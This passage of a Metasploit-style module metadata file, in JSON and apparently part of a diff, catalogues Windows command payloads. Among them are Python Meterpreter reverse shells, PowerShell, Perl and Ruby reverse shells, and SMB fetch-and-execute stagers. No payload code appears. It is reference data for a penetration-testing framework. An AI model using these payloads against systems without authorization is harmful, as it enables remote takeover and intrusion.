"rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp_uuid" - }, - "payload_cmd/windows/python/meterpreter_bind_tcp": { - "name": "Python Exec, Python Meterpreter Shell, Bind TCP Inline", - "fullname": "payload/cmd/windows/python/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", 
- "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nConnect to the victim and spawn a Meterpreter shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter_bind_tcp", - "staged": false - }, - "payload_cmd/windows/python/meterpreter_reverse_http": { - "name": "Python Exec, Python Meterpreter Shell, Reverse HTTP Inline", - "fullname": "payload/cmd/windows/python/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/windows/python/meterpreter_reverse_https": { - "name": "Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline", - "fullname": 
"payload/cmd/windows/python/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/windows/python/meterpreter_reverse_tcp": { - "name": "Python Exec, Python Meterpreter Shell, Reverse TCP Inline", - "fullname": "payload/cmd/windows/python/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter_reverse_tcp", - "staged": false - 
}, - "payload_cmd/windows/python/pingback_bind_tcp": { - "name": "Python Exec, Python Pingback, Bind TCP (via python)", - "fullname": "payload/cmd/windows/python/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "asoto-r7" - ], - "description": "Execute a Python payload from a command.\n\nListens for a connection from the attacker, sends a UUID, then terminates", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/pingback_bind_tcp", - "staged": false - }, - "payload_cmd/windows/python/pingback_reverse_tcp": { - "name": "Python Exec, Python Pingback, Reverse TCP (via python)", - "fullname": "payload/cmd/windows/python/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "asoto-r7" - ], - "description": "Execute a Python payload from a command.\n\nConnects back to the attacker, sends a UUID, then terminates", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": 
false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/python/shell_bind_tcp": { - "name": "Python Exec, Command Shell, Bind TCP (via python)", - "fullname": "payload/cmd/windows/python/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "mumbai" - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/shell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/python/shell_reverse_sctp": { - "name": "Python Exec, Command Shell, Reverse SCTP (via python)", - "fullname": "payload/cmd/windows/python/shell_reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "RageLtMan " - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/shell_reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/shell_reverse_sctp", - "staged": false - }, - "payload_cmd/windows/python/shell_reverse_tcp": { - "name": "Python Exec, Command Shell, Reverse TCP (via python)", - "fullname": "payload/cmd/windows/python/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Campbell " - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.4-2.7 and 3.4+.", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/python/shell_reverse_tcp_ssl": { - "name": "Python Exec, Command Shell, Reverse TCP SSL (via python)", - "fullname": "payload/cmd/windows/python/shell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "RageLtMan " - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, uses SSL, encodes with base64 by design. 
Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/shell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/shell_reverse_tcp_ssl", - "staged": false - }, - "payload_cmd/windows/python/shell_reverse_udp": { - "name": "Python Exec, Command Shell, Reverse UDP (via python)", - "fullname": "payload/cmd/windows/python/shell_reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "RageLtMan " - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/shell_reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/shell_reverse_udp", - "staged": false - }, - "payload_cmd/windows/reverse_lua": { - "name": "Windows Command Shell, Reverse TCP (via Lua)", - "fullname": "payload/cmd/windows/reverse_lua", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "xistence " - ], - "description": "Creates an interactive shell via Lua", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/reverse_lua.rb", - "is_install_path": true, - "ref_name": "cmd/windows/reverse_lua", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/reverse_perl": { - "name": "Windows Command, Double Reverse TCP Connection (via Perl)", - "fullname": "payload/cmd/windows/reverse_perl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "cazz ", - "aushack " - ], - "description": "Creates an interactive shell via perl", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - 
"mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/reverse_perl.rb", - "is_install_path": true, - "ref_name": "cmd/windows/reverse_perl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/reverse_powershell": { - "name": "Windows Command Shell, Reverse TCP (via Powershell)", - "fullname": "payload/cmd/windows/reverse_powershell", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Dave Kennedy", - "Ben Campbell " - ], - "description": "Connect back and create a command shell via Powershell", - "references": [ - "URL-https://github.com/trustedsec/social-engineer-toolkit/blob/master/src/powershell/reverse.powershell" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/reverse_powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/reverse_powershell", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/reverse_ruby": { - "name": "Windows Command Shell, Reverse TCP (via Ruby)", - "fullname": "payload/cmd/windows/reverse_ruby", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn " - ], - "description": "Connect back and create a command shell via Ruby", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/reverse_ruby.rb", - 
"is_install_path": true, - "ref_name": "cmd/windows/reverse_ruby", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/smb/x64/custom/bind_ipv6_tcp": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/custom/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID 
Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/custom/bind_named_pipe": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/smb/x64/custom/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_named_pipe" - }, - 
"payload_cmd/windows/smb/x64/custom/bind_tcp": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/smb/x64/custom/bind_tcp_rc4": { - "name": "SMB Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - 
"is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/custom/bind_tcp_uuid": { - "name": "SMB Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/custom/reverse_http": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/smb/x64/custom/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", 
- "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/reverse_http", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/smb/x64/custom/reverse_https": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/smb/x64/custom/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - 
"adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/reverse_https", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/smb/x64/custom/reverse_named_pipe": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/smb/x64/custom/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/smb/x64/custom/reverse_tcp": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": 
"Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/smb/x64/custom/reverse_tcp_rc4": { - "name": "SMB Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - 
"payload_cmd/windows/smb/x64/custom/reverse_tcp_uuid": { - "name": "SMB Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/custom/reverse_winhttp": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/smb/x64/custom/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 
+0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/smb/x64/custom/reverse_winhttps": { - "name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/smb/x64/custom/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 